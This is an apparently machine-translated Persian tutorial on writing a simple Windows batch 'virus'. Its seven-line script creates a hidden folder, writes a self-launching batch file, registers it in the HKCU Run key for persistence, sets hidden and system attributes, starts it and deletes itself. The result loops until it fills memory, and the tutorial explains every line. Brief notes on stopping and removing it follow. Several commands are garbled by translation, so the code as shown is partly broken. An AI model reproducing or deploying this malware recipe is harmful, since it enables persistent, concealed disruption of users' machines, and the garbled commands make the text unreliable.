علاوه بر این ، ما ویروس خود را به مرحله راه اندازی خواهیم انداخت ، که اطمینان حاصل می کند ویروس به طور خودکار همراه با سیستم عامل شروع می شود.

کد ویروس تولید شده

چه تعداد برنامه نویس ، و بسیاری از راه حل های مختلف برای هر کار می توان فکر کرد. من یکی از روشهای خود را برای حل چنین مشکلی ارائه خواهم داد.

md c: \\ papka
echo start c: \\ papka \\ virus.bat\u003e c: \\ papka \\ virus.bat
reg اضافه کردن HKCU \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run / v virus / d c: \\ papka \\ virus.bat
ویژگی + r + h + s c: \\ papka
ویژگی + r + h + s c: \\ papka \\ virus.bat
شروع c: \\ papka \\ virus.bat
دل٪ 0

حالا اجازه دهید خود کد را بررسی کنیم. خط اول پوشه ای به نام ایجاد می کند پاپکا در ریشه دیسک C: /... این آدرس فقط به عنوان مثال است. استفاده از ریشه پوشه C: / گزینه مناسبی برای ویروس نیست. اگر می خواهید از زنده ماندن ویروس خود اطمینان حاصل کنید ، بهتر است آن را پنهان کنید. اگر ویروس را در فهرست ایجاد شده از قبل رها کنید ، می توانید از اولین دستور صرفنظر کنید.

خط دوم پرونده را ایجاد می کند c: \\ papka \\ virus.bat و با استفاده از دستور echo ، دستور را در آن می نویسد شروع c: \\ papka \\ virus.bat... در اینجا باید بدانید که پس از علامت\u003e ، محل خروجی دستور داده شده نشان داده می شود. در اینجا شما باید آشنا شوید: c: \\ papka \\ virus.batو بدن اصلی ویروس است. پرونده .bat که ما با کدی که اکنون در حال تجزیه و تحلیل آن هستیم ایجاد کرده ایم فقط نصب ویروس اصلی ما است. می توانید از نام و مکان دیگری برای ویروس استفاده کنید.

خط سوم بدن ویروسی را که در خط دوم ایجاد کرده ایم به مرحله راه اندازی می اندازد. برای این ، شاخه رجیستری کاربر استفاده می شود ، زیرا کاربر همیشه به آن دسترسی دارد. اما استفاده از راه اندازی رایانه ایمن نیست ، زیرا ممکن است کاربر دسترسی مدیریتی نداشته باشد و این باعث خطای غیر ضروری می شود.

خط چهارم و پنجم کد خصوصیات ویروس و پوشه ای را که ویروس در آن ذخیره شده تغییر می دهد. با استفاده از این دستورات ، و برای این مورد استفاده می شود ، ما ویژگی ها را اضافه می کنیم فقط خواندنی ، پنهان و سیستمیک هم برای پوشه و هم برای ویروس. کاربرد صفت r (فقط خواندنی) لازم نیست. و در اینجا صفات وجود دارد پنهان و سیستمی از ویروسی که به خوبی ایجاد کرده ایم محافظت می کند. اگر به من باور ندارید ، مقاله مربوط به ویروس را بخوانید. او دقیقاً از این فناوری استفاده می کند.

خط 6 کد ویروس ما را راه اندازی می کند. اگر می خواهید ویروس برای اولین بار فقط پس از راه اندازی مجدد رایانه شما شروع شود ، می توانید از این مورد صرف نظر کنید.

و سرانجام ، آخرین خط 7 این ویروس .bat را از بین می برد. این مفید است ، زیرا با استفاده از این فایل .bat می توانید با خیال راحت به ویروسی که ایجاد کرده ایم دسترسی پیدا کرده و آن را حذف کنید.

معنی ویروس ایجاد شده

معنای ویروسی که در این 7 خط قرار می گیرد ایجاد ویروس اصلی ، محافظت از آن و اطمینان از عملکرد مداوم آن است. و همچنین آهنگ های خود را جارو کنید. ویروس اصلی چه کاری انجام می دهد؟ پس از شروع ویروس اصلی ، فرمانی را که در آن نوشته شده است ، اجرا می کند. و این دستور ، به نوبه خود ، ویروس ما را راه اندازی می کند ، که دوباره خود را دوباره راه اندازی می کند. و همینطور آگهی بی نهایت.

چگونه می توان با چنین ویروس هایی کنار آمد؟

ابتدا ، آغاز مبارزه با این ویروس پس از شروع آن آغاز می شود. خیلی زود ویروس حافظه RAM را با نسخه های خود پر می کند و شما حتی نمی توانید ماوس را حرکت دهید. بنابراین باید بلافاصله چنین نمایشی متوقف شود. دکمه Break روی صفحه کلید شما برای این کار مناسب است. برای جلوگیری از ایجاد نسخه های جدید ، آن را به اندازه لازم فشار دهید. در صفحه کلیدهای بدون دکمه Break ، Ctrl + C می تواند کمک کند.

چگونه می توان چنین ویروسی را از بین برد؟

شما می توانید از طریق ورود آن در هنگام راه اندازی (برای اطلاعات بیشتر به لینک مراجعه کنید). و همچنین می توانید با دستور به ویروس بروید ، که در پنجره مفسر دستور نمایش داده می شود. به طور طبیعی ، اگر می توانید به پرونده مخفی و سیستم بروید. به این ترتیب یک ویروس ساده ایجاد می شود.